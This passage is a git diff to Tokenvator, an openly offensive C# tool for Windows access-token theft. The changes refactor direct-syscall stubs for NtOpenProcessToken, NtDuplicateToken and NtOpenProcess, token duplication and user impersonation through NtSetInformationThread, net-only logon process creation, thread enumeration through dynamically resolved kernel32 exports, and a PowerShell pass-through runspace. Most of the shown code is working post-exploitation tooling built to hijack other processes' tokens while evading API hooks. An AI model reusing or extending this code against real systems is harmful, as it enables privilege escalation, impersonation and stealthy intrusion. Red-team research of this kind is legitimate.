         /// </summary>
         ////////////////////////////////////////////////////////////////////////////////
         private void _RunAsNetOnly()
@@ -1443,7 +1516,11 @@ private void _RunAsNetOnly()
             Console.WriteLine("[*] Username: {0}", username);
             Console.WriteLine("[*] Domain:   {0}", domain);
             Console.WriteLine("[*] Password: {0}", password);
+            Console.WriteLine("[*] Command: {0}", cLP.Command);
 
+            CreateProcess.CreateProcessWithLogonW(username, domain, password, cLP.Command, cLP.Arguments);
+
+            /*
             if (string.IsNullOrEmpty(cLP.Command))
             {
                 using(CreateTokens ct = new CreateTokens())
@@ -1460,32 +1537,73 @@ private void _RunAsNetOnly()
             }
             else
             {
-                Console.WriteLine("[*] Command: {0}", cLP.Command);
-
-                CreateProcess.CreateProcessWithLogonW(username, domain, password, cLP.Command, cLP.Arguments);
             }
+            */
+
         }
 
         ////////////////////////////////////////////////////////////////////////////////
         /// <summary>
         /// Pass through powershell command
         /// No conversions required
+        /// QA OK
         /// </summary>
         ////////////////////////////////////////////////////////////////////////////////
         private void _RunPowerShell()
         {
-            Runspace runspace = RunspaceFactory.CreateRunspace();
-            runspace.Open();
-            RunspaceInvoke scriptInvoker = new RunspaceInvoke(runspace);
-            Pipeline pipeline = runspace.CreatePipeline();
-            pipeline.Commands.AddScript(cLP.Command);
-            pipeline.Commands.Add("Out-String");
-            Collection<PSObject> results = pipeline.Invoke();
-            runspace.Close();
-
-            foreach (PSObject obj in results)
+            using (Runspace runspace = RunspaceFactory.CreateRunspace())
             {
-                Console.WriteLine(obj.ToString());
+                runspace.Open();
+
+                using (PowerShell ps = PowerShell.Create())
+                {
+                    ps.Runspace = runspace;
+
+                    ps.AddStatement().AddScript(cLP.CommandAndArgs);
+
+                    var outputCollection = new PSDataCollection<object>();
+
+                    ps.Streams.Error.DataAdded += (sender, e) =>
+                    {
+                        Console.WriteLine("Error");
+                        foreach (ErrorRecord er in ps.Streams.Error.ReadAll())
+                        {
+                            outputCollection.Add(er);
+                        }
+                    };
+                    ps.Streams.Verbose.DataAdded += (sender, e) =>
+                    {
+                        foreach (VerboseRecord vr in ps.Streams.Verbose.ReadAll())
+                        {
+                            outputCollection.Add(vr);
+                        }
+                    };
+                    ps.Streams.Debug.DataAdded += (sender, e) =>
+                    {
+                        foreach (DebugRecord dr in ps.Streams.Debug.ReadAll())
+                        {
+
+                            outputCollection.Add(dr);
+                        }
+                    };
+                    ps.Streams.Warning.DataAdded += (sender, e) =>
+                    {
+                        foreach (WarningRecord wr in ps.Streams.Warning)
+                        {
+                            outputCollection.Add(wr);
+                        }
+                    };
+
+                    ps.Invoke(null, outputCollection);
+
+                    Console.WriteLine(string.Join(
+                        Environment.NewLine,
+                        outputCollection
+                        .Where(R => R != null)
+                        .Select(R => R.ToString())
+                        .ToArray()
+                    ));
+                }
             }
         }
 
@@ -1493,6 +1611,7 @@ private void _RunPowerShell()
         /// <summary>
         /// Prints the generic help menu that lists the commands
         /// No conversions required
+        /// QA OK
         /// </summary>
         ////////////////////////////////////////////////////////////////////////////////
         private static void _HelpMenu()
@@ -1516,6 +1635,7 @@ private static void _HelpMenu()
         /// <summary>
         /// Prints an example for a specific command
         /// No conversions required
+        /// QA OK
         /// </summary>
         ////////////////////////////////////////////////////////////////////////////////
         private static void _HelpItem(string input)
@@ -1544,37 +1664,4 @@ private static void _HelpItem(string input)
 
         }
     }
-
-    public static class ProcessExtensions
-    {
-        private static string FindIndexedProcessName(int pid)
-        {
-            var processName = Process.GetProcessById(pid).ProcessName;
-            var processesByName = Process.GetProcessesByName(processName);
-            string processIndexdName = null;
-
-            for (var index = 0; index < processesByName.Length; index++)
-            {
-                processIndexdName = index == 0 ? processName : processName + "#" + index;
-                var processId = new PerformanceCounter("Process", "ID Process", processIndexdName);
-                if ((int)processId.NextValue() == pid)
-                {
-                    return processIndexdName;
-                }
-            }
-
-            return processIndexdName;
-        }
-
-        private static Process FindPidFromIndexedProcessName(string indexedProcessName)
-        {
-            var parentId = new PerformanceCounter("Process", "Creating Process ID", indexedProcessName);
-            return Process.GetProcessById((int)parentId.NextValue());
-        }
-
-        public static Process Parent(this Process process)
-        {
-            return FindPidFromIndexedProcessName(FindIndexedProcessName(process.Id));
-        }
-    }
-}
+}
\ No newline at end of file
diff --git a/Tokenvator/MainLoop.cs b/Tokenvator/MainLoop.cs
index 8280064..7dd0134 100644
--- a/Tokenvator/MainLoop.cs
+++ b/Tokenvator/MainLoop.cs
@@ -79,13 +79,14 @@ partial class MainLoop
             {"", "", "", ""}
         };
 
-        private readonly CommandLineParsing cLP;
+        private CommandLineParsing cLP;
         private readonly TabComplete console;
         private readonly bool activateTabs;
 
         private Process process;
 
         private IntPtr currentProcessToken;
+        private readonly IntPtr currentProcessTokenBackup;
 
         public MainLoop(bool activateTabs)
         {
@@ -95,26 +96,31 @@ public MainLoop(bool activateTabs)
                 console = new TabComplete(context, options);
             }
 
-            cLP = new CommandLineParsing();
-        }
+            currentProcessToken = new IntPtr();
+            currentProcessTokenBackup = new IntPtr();
 
-        ////////////////////////////////////////////////////////////////////////////////
-        // Mainloop
-        ////////////////////////////////////////////////////////////////////////////////
-        internal void Run()
-        {
             ////////////////////////////////////////////////////////////////////////////////
             // Open a limited handle to the process via a syscall stub
             // IntPtr hProcess = kernel32.OpenProcess(ProcessThreadsApi.ProcessSecurityRights.PROCESS_QUERY_INFORMATION, false, (uint)processId);
-            ////////////////////////////////////////////////////////////////////////////////    
-            IntPtr hNtOpenProcessToken = Generic.GetSyscallStub("NtOpenProcessToken");
+            //////////////////////////////////////////////////////////////////////////////// 
+            IntPtr hNtOpenProcessToken;
+            try
+            {
+                hNtOpenProcessToken = Generic.GetSyscallStub("NtOpenProcessToken");
+            }
+            catch (Exception ex)
+            {
+                Misc.GetExceptionMessage(ex, "GetSyscallStub - NtOpenProcessToken");
+                return;
+            }
+
             var fSyscallNtOpenProcessToken = (MonkeyWorks.ntdll.NtOpenProcessToken)Marshal.GetDelegateForFunctionPointer(hNtOpenProcessToken, typeof(MonkeyWorks.ntdll.NtOpenProcessToken));
 
             uint ntRetVal = 0;
             try
             {
                 IntPtr hProcess = new IntPtr(-1);
-                ntRetVal = fSyscallNtOpenProcessToken(hProcess, Winnt.TOKEN_ALL_ACCESS, ref currentProcessToken);
+                ntRetVal = fSyscallNtOpenProcessToken(hProcess, Winnt.TOKEN_ALL_ACCESS, ref currentProcessTokenBackup);
             }
             catch (Exception ex)
             {
@@ -125,7 +131,16 @@ internal void Run()
             {
                 Misc.GetNtError("NtOpenProcessToken", ntRetVal);
             }
+        }
 
+        ////////////////////////////////////////////////////////////////////////////////
+        /// <summary>
+        /// Mainloop
+        /// </summary>
+        ////////////////////////////////////////////////////////////////////////////////
+        internal void Run()
+        {
+            currentProcessToken = currentProcessTokenBackup;
 
             Console.Write(context);
             string input;
@@ -147,13 +162,11 @@ internal void Run()
 
             string action = Misc.NextItem(ref input);
 
-            if (!string.Equals(action, input, StringComparison.OrdinalIgnoreCase))
+            cLP = new CommandLineParsing();
+            if (!cLP.Parse(input))
             {
-                if (!cLP.Parse(input))
-                {
-                    return;
-                }    
-            }
+                return;
+            }    
 
             try
             {
@@ -310,7 +323,7 @@ internal void Run()
             }
             catch (Exception ex)
             {
-                Misc.GetExceptionMessage(ex, "MainLoop");
+                Console.WriteLine(ex);
                 Misc.GetWin32Error("MainLoop");
             }
             Console.WriteLine();
diff --git a/Tokenvator/Plugins/AccessTokens/AccessTokens.cs b/Tokenvator/Plugins/AccessTokens/AccessTokens.cs
index 1f41e7d..9f995ea 100644
--- a/Tokenvator/Plugins/AccessTokens/AccessTokens.cs
+++ b/Tokenvator/Plugins/AccessTokens/AccessTokens.cs
@@ -22,9 +22,9 @@ class AccessTokens : IDisposable
     {
         private bool Disposed = false;
 
-        protected IntPtr phNewToken;// { private get; set; }
-        protected IntPtr hExistingToken;// { private get; set; }
-        protected IntPtr currentProcessToken;// { private get; set; }
+        protected IntPtr phNewToken = IntPtr.Zero;// { private get; set; }
+        protected IntPtr hExistingToken = IntPtr.Zero;// { private get; set; }
+        protected IntPtr currentProcessToken = IntPtr.Zero;// { private get; set; }
 
         protected IntPtr hWorkingToken { get; private set; }
         protected IntPtr hWorkingThreadToken { get; private set; }
@@ -33,9 +33,8 @@ class AccessTokens : IDisposable
 
         internal delegate bool Create(IntPtr phNewToken, string newProcess, string arguments);
 
-        private readonly IntPtr hNtOpenProcess;
-        private readonly IntPtr hNtOpenProcessToken;
-        private static readonly IntPtr hNtClose = Generic.GetSyscallStub("NtClose");
+        private IntPtr hNtOpenProcess = IntPtr.Zero;
+        private IntPtr hNtOpenProcessToken = IntPtr.Zero;
 
         ////////////////////////////////////////////////////////////////////////////////
         /// <summary>
@@ -51,9 +50,6 @@ public AccessTokens(IntPtr currentProcessToken)
 
             hWorkingToken = new IntPtr();
             hWorkingThreadToken = new IntPtr();
-
-            hNtOpenProcess = Generic.GetSyscallStub("NtOpenProcess");
-            hNtOpenProcessToken = Generic.GetSyscallStub("NtOpenProcessToken");
         }
 
         ////////////////////////////////////////////////////////////////////////////////
@@ -135,8 +131,18 @@ public IntPtr GetWorkingToken()
         [HandleProcessCorruptedStateExceptions]
         public bool DuplicateToken(Winnt._SECURITY_IMPERSONATION_LEVEL impersonationLevel, Winnt._TOKEN_TYPE tokenType)
         {
-            IntPtr hNtDuplicateToken = Generic.GetSyscallStub("NtDuplicateToken");
-            MonkeyWorks.ntdll.NtDuplicateToken fSyscallNtDuplicateToken = (MonkeyWorks.ntdll.NtDuplicateToken)Marshal.GetDelegateForFunctionPointer(hNtDuplicateToken, typeof(MonkeyWorks.ntdll.NtDuplicateToken));
+            IntPtr hNtDuplicateToken;
+            try
+            {
+                hNtDuplicateToken = Generic.GetSyscallStub("NtDuplicateToken");
+            }
+            catch (Exception ex)
+            {
+                Misc.GetExceptionMessage(ex, "GetSyscallStub - NtDuplicateToken");
+                return false;
+            }
+
+            var fSyscallNtDuplicateToken = (MonkeyWorks.ntdll.NtDuplicateToken)Marshal.GetDelegateForFunctionPointer(hNtDuplicateToken, typeof(MonkeyWorks.ntdll.NtDuplicateToken));
 
             uint ntRetVal = 0;
 
@@ -169,13 +175,13 @@ public bool DuplicateToken(Winnt._SECURITY_IMPERSONATION_LEVEL impersonationLeve
             }
             catch (Exception ex)
             {
-                Console.WriteLine("[-] NtDuplicateToken Generated an Exception");
-                Console.WriteLine("[-] {0}", ex.Message);
+                Misc.GetExceptionMessage(ex, "NtDuplicateToken");
                 return false;
             }
             finally
             {
                 hObjectAttributes.Free();
+                Marshal.FreeHGlobal(hSecurityContextTrackingMode);
             }
 
             if (0 != ntRetVal)
@@ -188,6 +194,94 @@ public bool DuplicateToken(Winnt._SECURITY_IMPERSONATION_LEVEL impersonationLeve
             return true;
         }
 
+        ////////////////////////////////////////////////////////////////////////////////
+        /// <summary>
+        /// List all threads for a given process
+        /// Converted to D/Invoke GetPebLdrModuleEntry/GetExportAddress
+        /// </summary>
+        /// <param name="processId"></param>
+        /// <returns>Returns true if successful, returns false if an error or exception was generated</returns>
+        ////////////////////////////////////////////////////////////////////////////////
+        [SecurityCritical]
+        [HandleProcessCorruptedStateExceptions]
+        public bool ListThreads(int processId)
+        {
+            if (0 == processId)
+            {
+                processId = Process.GetCurrentProcess().Id;
+            }
+
+            ////////////////////////////////////////////////////////////////////////////////
+            // Create a snapshot of all system threads that can be walked through
+            // IntPtr hSnapshot = kernel32.CreateToolhelp32Snapshot(TiHelp32.TH32CS_SNAPTHREAD, 0);
+            ////////////////////////////////////////////////////////////////////////////////
+
+            IntPtr hKernel32 = Generic.GetPebLdrModuleEntry("kernel32.dll");
+            IntPtr hCreateToolhelp32Snapshot = Generic.GetExportAddress(hKernel32, "CreateToolhelp32Snapshot");
+            var fCreateToolhelp32Snapshot = (MonkeyWorks.kernel32.CreateToolhelp32Snapshot)Marshal.GetDelegateForFunctionPointer(hCreateToolhelp32Snapshot, typeof(MonkeyWorks.kernel32.CreateToolhelp32Snapshot));
+            
+            IntPtr hSnapshot;
+            try
+            {
+                hSnapshot = fCreateToolhelp32Snapshot(TiHelp32.TH32CS_SNAPTHREAD, 0);
+            }
+            catch (Exception ex)
+            {
+                Console.WriteLine("[-] CreateToolhelp32Snapshot Generated an Exception");
+                Console.WriteLine("[-] {0}", ex.Message);
+                return false;
+            }
+
+            if (IntPtr.Zero == hSnapshot)
+            {
+                Misc.GetWin32Error("CreateToolhelp32Snapshot");
+                CloseHandle(hKernel32);
+                return false;
+            }
+
+            ////////////////////////////////////////////////////////////////////////////////
+            // Iterate through the first snapshot instance
+            // kernel32.Thread32First(hSnapshot, ref threadEntry32);
+            ////////////////////////////////////////////////////////////////////////////////
+
+            IntPtr hThread32First = Generic.GetExportAddress(hKernel32, "Thread32First");
+            var fThread32First = (MonkeyWorks.kernel32.Thread32First)Marshal.GetDelegateForFunctionPointer(hThread32First, typeof(MonkeyWorks.kernel32.Thread32First));
+
+            TiHelp32.tagTHREADENTRY32 threadEntry32 = new TiHelp32.tagTHREADENTRY32()
+            {
+                dwSize = (uint)Marshal.SizeOf(typeof(TiHelp32.tagTHREADENTRY32))
+            };
+
+            if (!fThread32First(hSnapshot, ref threadEntry32))
+            {
+                Misc.GetWin32Error("Thread32First");
+                return false;
+            }
+
+            if (threadEntry32.th32OwnerProcessID == processId)
+            {
+                threads.Add(threadEntry32.th32ThreadID);
+            }
+
+            ////////////////////////////////////////////////////////////////////////////////
+            // Iterate through the remainder of the snapshot instances
+            // kernel32.Thread32First(hSnapshot, ref threadEntry32);
+            ////////////////////////////////////////////////////////////////////////////////
+
+            IntPtr hThread32Next = Generic.GetExportAddress(hKernel32, "Thread32Next");
+            var fThread32Next = (MonkeyWorks.kernel32.Thread32Next)Marshal.GetDelegateForFunctionPointer(hThread32Next, typeof(MonkeyWorks.kernel32.Thread32Next));
+
+            while (fThread32Next(hSnapshot, ref threadEntry32))
+            {
+                if (threadEntry32.th32OwnerProcessID == processId)
+                {
+                    threads.Add(threadEntry32.th32ThreadID);
+                }
+            }
+
+            return true;
+        }
+
         ////////////////////////////////////////////////////////////////////////////////
         /// <summary>
         /// Opens a process Token
@@ -198,13 +292,27 @@ public bool DuplicateToken(Winnt._SECURITY_IMPERSONATION_LEVEL impersonationLeve
         ////////////////////////////////////////////////////////////////////////////////
         [SecurityCritical]
         [HandleProcessCorruptedStateExceptions]
-        public virtual bool OpenProcessToken(int processId, bool showOutput = true)
+        public bool OpenProcessToken(int processId, bool showOutput = true)
         {
             ////////////////////////////////////////////////////////////////////////////////
             // Open a limited handle to the process via a syscall stub
             // IntPtr hProcess = kernel32.OpenProcess(ProcessThreadsApi.ProcessSecurityRights.PROCESS_QUERY_INFORMATION, false, (uint)processId);
-            ////////////////////////////////////////////////////////////////////////////////    
-            MonkeyWorks.ntdll.NtOpenProcess fSyscallNtOpenProcess = (MonkeyWorks.ntdll.NtOpenProcess)Marshal.GetDelegateForFunctionPointer(hNtOpenProcess, typeof(MonkeyWorks.ntdll.NtOpenProcess));
+            ////////////////////////////////////////////////////////////////////////////////  
+            #region NtOpenProcess
+            if (IntPtr.Zero == hNtOpenProcess)
+            {
+                try
+                {
+                    hNtOpenProcess = Generic.GetSyscallStub("NtOpenProcess");
+                }
+                catch (Exception ex)
+                {
+                    Misc.GetExceptionMessage(ex, "GetSyscallStub - NtOpenProcess");
+                    return false;
+                }
+            }
+
+            var fSyscallNtOpenProcess = (MonkeyWorks.ntdll.NtOpenProcess)Marshal.GetDelegateForFunctionPointer(hNtOpenProcess, typeof(MonkeyWorks.ntdll.NtOpenProcess));
 
             IntPtr hProcess = new IntPtr();
             MonkeyWorks.ntdll.OBJECT_ATTRIBUTES objectAttributes = new MonkeyWorks.ntdll.OBJECT_ATTRIBUTES();
@@ -238,21 +346,38 @@ public virtual bool OpenProcessToken(int processId, bool showOutput = true)
             {
                 Console.WriteLine("[*] Recieved Process Handle 0x{0}", hProcess.ToString("X4"));
             }
+            #endregion
 
             ////////////////////////////////////////////////////////////////////////////////
             // Open a handle to the process token
             // bool retVal = kernel32.OpenProcessToken(hProcess, (ulong)Winnt.TOKEN_ALL_ACCESS, out hExistingToken)
-            ////////////////////////////////////////////////////////////////////////////////       
-            MonkeyWorks.ntdll.NtOpenProcessToken fSyscallNtOpenProcessToken = (MonkeyWorks.ntdll.NtOpenProcessToken)Marshal.GetDelegateForFunctionPointer(hNtOpenProcessToken, typeof(MonkeyWorks.ntdll.NtOpenProcessToken));
+            //////////////////////////////////////////////////////////////////////////////// 
+            #region NtOpenProcessToken
+            if (IntPtr.Zero == hNtOpenProcessToken)
+            {
+                try
+                {
+                    hNtOpenProcessToken = Generic.GetSyscallStub("NtOpenProcessToken");
+                }
+                catch (Exception ex)
+                {
+                    Misc.GetExceptionMessage(ex, "GetSyscallStub - NtOpenProcessToken");
+                    return false;
+                }
+            }
+
+            var fSyscallNtOpenProcessToken = (MonkeyWorks.ntdll.NtOpenProcessToken)Marshal.GetDelegateForFunctionPointer(hNtOpenProcessToken, typeof(MonkeyWorks.ntdll.NtOpenProcessToken));
 
+            ////////////////////////////////////////////////////////////////////////////////
+            // Open Token with TOKEN_ALL_ACCESS
+            ////////////////////////////////////////////////////////////////////////////////
             try
             {
                 ntRetVal = fSyscallNtOpenProcessToken(hProcess, Winnt.TOKEN_ALL_ACCESS, ref hExistingToken);
             }
             catch (Exception ex)
             {
-                Console.WriteLine("[-] NtOpenProcessToken Generated an Exception");
-                Console.WriteLine("[-] {0}", ex.Message);
+                Misc.GetExceptionMessage(ex, "NtOpenProcessToken");
                 return false;
             }
 
@@ -263,14 +388,17 @@ public virtual bool OpenProcessToken(int processId, bool showOutput = true)
                     Misc.GetNtError("NtOpenProcessToken", ntRetVal);
                 }
 
+                ////////////////////////////////////////////////////////////////////////////////
+                // Retry by Opening Token with MAXIMUM_ALLOWED
+                ////////////////////////////////////////////////////////////////////////////////
+                Console.WriteLine(" [*] TOKEN_ALL_ACCESS Failed, Retrying with {0}", Winnt.ACCESS_MASK.MAXIMUM_ALLOWED);
                 try
                 {
                     ntRetVal = fSyscallNtOpenProcessToken(hProcess, (uint)Winnt.ACCESS_MASK.MAXIMUM_ALLOWED, ref hExistingToken);
                 }
                 catch (Exception ex)
                 {
-                    Console.WriteLine("[-] NtOpenProcessToken Generated an Exception");
-                    Console.WriteLine("[-] {0}", ex.Message);
+                    Misc.GetExceptionMessage(ex, "NtOpenProcessToken");
                     return false;
                 }
 
@@ -290,98 +418,12 @@ public virtual bool OpenProcessToken(int processId, bool showOutput = true)
             {
                 Console.WriteLine("[*] Recieved Token Handle 0x{0}", hExistingToken.ToString("X4"));
             }
+            #endregion
 
             CloseHandle(hProcess);
             return true;
         }
 
-        ////////////////////////////////////////////////////////////////////////////////
-        /// <summary>
-        /// List all threads for a given process
-        /// Converted to D/Invoke GetPebLdrModuleEntry/GetExportAddress
-        /// </summary>
-        /// <param name="processId"></param>
-        /// <returns>Returns true if successful, returns false if an error or exception was generated</returns>
-        ////////////////////////////////////////////////////////////////////////////////
-        [SecurityCritical]
-        [HandleProcessCorruptedStateExceptions]
-        public bool ListThreads(int processId)
-        {
-            if (0 == processId)
-            {
-                processId = Process.GetCurrentProcess().Id;
-            }
-
-            ////////////////////////////////////////////////////////////////////////////////
-            // Create a snapshot of all system threads that can be walked through
-            // IntPtr hSnapshot = kernel32.CreateToolhelp32Snapshot(TiHelp32.TH32CS_SNAPTHREAD, 0);
-            ////////////////////////////////////////////////////////////////////////////////
-
-            IntPtr hKernel32 = Generic.GetPebLdrModuleEntry("kernel32.dll");
-            IntPtr hCreateToolhelp32Snapshot = Generic.GetExportAddress(hKernel32, "CreateToolhelp32Snapshot");
-            MonkeyWorks.kernel32.CreateToolhelp32Snapshot fCreateToolhelp32Snapshot = (MonkeyWorks.kernel32.CreateToolhelp32Snapshot)Marshal.GetDelegateForFunctionPointer(hCreateToolhelp32Snapshot, typeof(MonkeyWorks.kernel32.CreateToolhelp32Snapshot));
-            
-            IntPtr hSnapshot;
-            try
-            {
-                hSnapshot = fCreateToolhelp32Snapshot(TiHelp32.TH32CS_SNAPTHREAD, 0);
-            }
-            catch (Exception ex)
-            {
-                Console.WriteLine("[-] OpenWindowStationW Generated an Exception");
-                Console.WriteLine("[-] {0}", ex.Message);
-                return false;
-            }
-
-            if (IntPtr.Zero == hSnapshot)
-            {
-                Misc.GetWin32Error("CreateToolhelp32Snapshot");
-                CloseHandle(hKernel32);
-                return false;
-            }
-
-            ////////////////////////////////////////////////////////////////////////////////
-            // Iterate through the first snapshot instance
-            // kernel32.Thread32First(hSnapshot, ref threadEntry32);
-            ////////////////////////////////////////////////////////////////////////////////
-
-            TiHelp32.tagTHREADENTRY32 threadEntry32 = new TiHelp32.tagTHREADENTRY32()
-            {
-                dwSize = (uint)Marshal.SizeOf(typeof(TiHelp32.tagTHREADENTRY32))
-            };
-
-            IntPtr hThread32First = Generic.GetExportAddress(hKernel32, "Thread32First");
-            MonkeyWorks.kernel32.Thread32First fThread32First = (MonkeyWorks.kernel32.Thread32First)Marshal.GetDelegateForFunctionPointer(hThread32First, typeof(MonkeyWorks.kernel32.Thread32First));
-            if (!fThread32First(hSnapshot, ref threadEntry32))
-            {
-                Misc.GetWin32Error("Thread32First");
-                return false;
-            }
-
-            if (threadEntry32.th32OwnerProcessID == processId)
-            {
-                threads.Add(threadEntry32.th32ThreadID);
-            }
-
-            ////////////////////////////////////////////////////////////////////////////////
-            // Iterate through the remainder of the snapshot instances
-            // kernel32.Thread32First(hSnapshot, ref threadEntry32);
-            ////////////////////////////////////////////////////////////////////////////////
-
-            IntPtr hThread32Next = Generic.GetExportAddress(hKernel32, "Thread32Next");
-            MonkeyWorks.kernel32.Thread32Next fThread32Next = (MonkeyWorks.kernel32.Thread32Next)Marshal.GetDelegateForFunctionPointer(hThread32Next, typeof(MonkeyWorks.kernel32.Thread32Next));
-
-            while (fThread32Next(hSnapshot, ref threadEntry32))
-            {
-                if (threadEntry32.th32OwnerProcessID == processId)
-                {
-                    threads.Add(threadEntry32.th32ThreadID);
-                }
-            }
-
-            return true;
-        }
-
         ////////////////////////////////////////////////////////////////////////////////
         /// <summary>
         /// Opens a thread token
@@ -401,7 +443,7 @@ public bool OpenThreadToken(uint threadId, uint permissions)
             ////////////////////////////////////////////////////////////////////////////////
 
             IntPtr hNtOpenThread = Generic.GetSyscallStub("NtOpenThread");
-            MonkeyWorks.ntdll.NtOpenThread fSyscallNtOpenThread = (MonkeyWorks.ntdll.NtOpenThread)Marshal.GetDelegateForFunctionPointer(hNtOpenThread, typeof(MonkeyWorks.ntdll.NtOpenThread));
+            var fSyscallNtOpenThread = (MonkeyWorks.ntdll.NtOpenThread)Marshal.GetDelegateForFunctionPointer(hNtOpenThread, typeof(MonkeyWorks.ntdll.NtOpenThread));
 
             IntPtr hThread = new IntPtr();
             MonkeyWorks.ntdll.OBJECT_ATTRIBUTES objectAttributes = new MonkeyWorks.ntdll.OBJECT_ATTRIBUTES();
@@ -436,7 +478,7 @@ public bool OpenThreadToken(uint threadId, uint permissions)
             ////////////////////////////////////////////////////////////////////////////////
 
             IntPtr hNtOpenThreadToken = Generic.GetSyscallStub("NtOpenThreadToken");
-            MonkeyWorks.ntdll.NtOpenThreadToken fSyscallNtOpenThreadToken = (MonkeyWorks.ntdll.NtOpenThreadToken)Marshal.GetDelegateForFunctionPointer(hNtOpenThreadToken, typeof(MonkeyWorks.ntdll.NtOpenThreadToken));
+            var fSyscallNtOpenThreadToken = (MonkeyWorks.ntdll.NtOpenThreadToken)Marshal.GetDelegateForFunctionPointer(hNtOpenThreadToken, typeof(MonkeyWorks.ntdll.NtOpenThreadToken));
 
             try
             {
@@ -482,10 +524,15 @@ public bool StartProcessAsUser(string newProcess)
         {
             Create createProcess;
             if (0 == Process.GetCurrentProcess().SessionId)
+            {
                 createProcess = CreateProcess.CreateProcessWithLogonW;
+            }
             else
+            {
                 createProcess = CreateProcess.CreateProcessWithTokenW;
-            string arguments = string.Empty;
+            }
+
+            string arguments;
             Misc.FindExe(ref newProcess, out arguments);
 
             if (!createProcess(hWorkingToken, newProcess, arguments))
@@ -510,22 +557,35 @@ public virtual bool ImpersonateUser()
             // Duplicate an existing token
             // Winbase._SECURITY_ATTRIBUTES securityAttributes = new Winbase._SECURITY_ATTRIBUTES();
             // advapi32.DuplicateTokenEx(hWorkingToken, (uint)Winnt.ACCESS_MASK.MAXIMUM_ALLOWED, ref securityAttributes, Winnt._SECURITY_IMPERSONATION_LEVEL.SecurityImpersonation, Winnt._TOKEN_TYPE.TokenPrimary, out phNewToken)
+            // This used to work with Winnt._TOKEN_PRIMARY, another MS silent patch
             ////////////////////////////////////////////////////////////////////////////////
-            DuplicateToken(Winnt._SECURITY_IMPERSONATION_LEVEL.SecurityImpersonation, Winnt._TOKEN_TYPE.TokenImpersonation);
+            if (!DuplicateToken(Winnt._SECURITY_IMPERSONATION_LEVEL.SecurityImpersonation, Winnt._TOKEN_TYPE.TokenImpersonation))
+            {
+                return false;
+            }
 
             ////////////////////////////////////////////////////////////////////////////////
             // Impersonate a newly duplicated token
             // advapi32.ImpersonateLoggedOnUser(phNewToken)            
             ////////////////////////////////////////////////////////////////////////////////
-
-            IntPtr hNtSetInformationThread = Generic.GetSyscallStub("NtSetInformationThread");
-            MonkeyWorks.ntdll.NtSetInformationThread fSyscallNtSetInformationThread = (MonkeyWorks.ntdll.NtSetInformationThread)Marshal.GetDelegateForFunctionPointer(hNtSetInformationThread, typeof(MonkeyWorks.ntdll.NtSetInformationThread));
-
+            
             IntPtr hkernel32 = Generic.GetPebLdrModuleEntry("kernel32.dll");
             IntPtr hGetCurrentThread = Generic.GetExportAddress(hkernel32, "GetCurrentThread");
-            MonkeyWorks.kernel32.GetCurrentThread fGetCurrentThread = (MonkeyWorks.kernel32.GetCurrentThread)Marshal.GetDelegateForFunctionPointer(hGetCurrentThread, typeof(MonkeyWorks.kernel32.GetCurrentThread));
+            var fGetCurrentThread = (MonkeyWorks.kernel32.GetCurrentThread)Marshal.GetDelegateForFunctionPointer(hGetCurrentThread, typeof(MonkeyWorks.kernel32.GetCurrentThread));
 
-            IntPtr hThread = fGetCurrentThread();
+            IntPtr hThread = IntPtr.Zero;
+            try
+            {
+                hThread = fGetCurrentThread();
+            }
+            catch (Exception ex)
+            {
+                Misc.GetExceptionMessage(ex, "GetCurrentThread");
+                return false;
+            }
+
+            IntPtr hNtSetInformationThread = Generic.GetSyscallStub("NtSetInformationThread");
+            var fSyscallNtSetInformationThread = (MonkeyWorks.ntdll.NtSetInformationThread)Marshal.GetDelegateForFunctionPointer(hNtSetInformationThread, typeof(MonkeyWorks.ntdll.NtSetInformationThread));
 
             uint ntRetVal = 0;
             try
@@ -546,7 +606,6 @@ public virtual bool ImpersonateUser()
             if (0 != ntRetVal)
             {
                 Misc.GetNtError("NtSetInformationThread", ntRetVal);
-                Console.ReadKey();
                 return false;
             }
 
@@ -564,19 +623,21 @@ public virtual bool ImpersonateUser()
         ////////////////////////////////////////////////////////////////////////////////
         [SecurityCritical]
         [HandleProcessCorruptedStateExceptions]
-        public static bool CloseHandle(IntPtr handle)
+        public bool CloseHandle(IntPtr handle)
         {
+            IntPtr hkernel32 = Generic.GetPebLdrModuleEntry("kernel32.dll");
+            IntPtr hCloseHandle = Generic.GetExportAddress(hkernel32, "CloseHandle");
+            var fCloseHandle = (MonkeyWorks.kernel32.CloseHandle)Marshal.GetDelegateForFunctionPointer(hCloseHandle, typeof(MonkeyWorks.kernel32.CloseHandle));
+
             if (IntPtr.Zero == handle)
             {
                 return true;
             }
 
-            MonkeyWorks.ntdll.NtClose fSyscallhNtClose = (MonkeyWorks.ntdll.NtClose)Marshal.GetDelegateForFunctionPointer(hNtClose, typeof(MonkeyWorks.ntdll.NtClose));
-
-            uint ntRetVal = 0;
+            bool retVal = false;
             try
             {
-                ntRetVal = fSyscallhNtClose(handle);
+                retVal = fCloseHandle(handle);
             }
             catch (Exception ex)
             {
@@ -590,7 +651,7 @@ public static bool CloseHandle(IntPtr handle)
                 return true;
             }
 
-            if (0 != ntRetVal)
+            if (!retVal)
             {
                 //Misc.GetNtError("NtClose", ntRetVal);
                 //Console.WriteLine("[-] {0}", (new StackTrace()).GetFrame(1).GetMethod().Name);
@@ -623,12 +684,12 @@ public virtual void Dispose()
             if (IntPtr.Zero != phNewToken)
             {
                 //Console.WriteLine("phNewToken");
-                CloseHandle(phNewToken);
+                //CloseHandle(phNewToken);
             }
             if (IntPtr.Zero != hExistingToken)
             {
                 //Console.WriteLine("hExistingToken");
-                CloseHandle(hExistingToken);
+                //CloseHandle(hExistingToken);
             }
             /*
             This should be covered by the other closed handles
@@ -641,7 +702,7 @@ This should be covered by the other closed handles
             if (IntPtr.Zero != hWorkingThreadToken)
             {
                 //Console.WriteLine("hWorkingThreadToken");
-                CloseHandle(hWorkingThreadToken);
+                //CloseHandle(hWorkingThreadToken);
             }
 
             Disposed = true;
diff --git a/Tokenvator/Plugins/AccessTokens/CreateTokens.cs b/Tokenvator/Plugins/AccessTokens/CreateTokens.cs
index 4c2d378..47c63e5 100644
--- a/Tokenvator/Plugins/AccessTokens/CreateTokens.cs
+++ b/Tokenvator/Plugins/AccessTokens/CreateTokens.cs
@@ -261,6 +261,9 @@ public void CreateToken(string userName, string[] groups, string command)
 
             phNewToken = Marshal.AllocHGlobal(Marshal.SizeOf(typeof(IntPtr)));
 
+            ////////////////////////////////////////////////////////////////////////////////
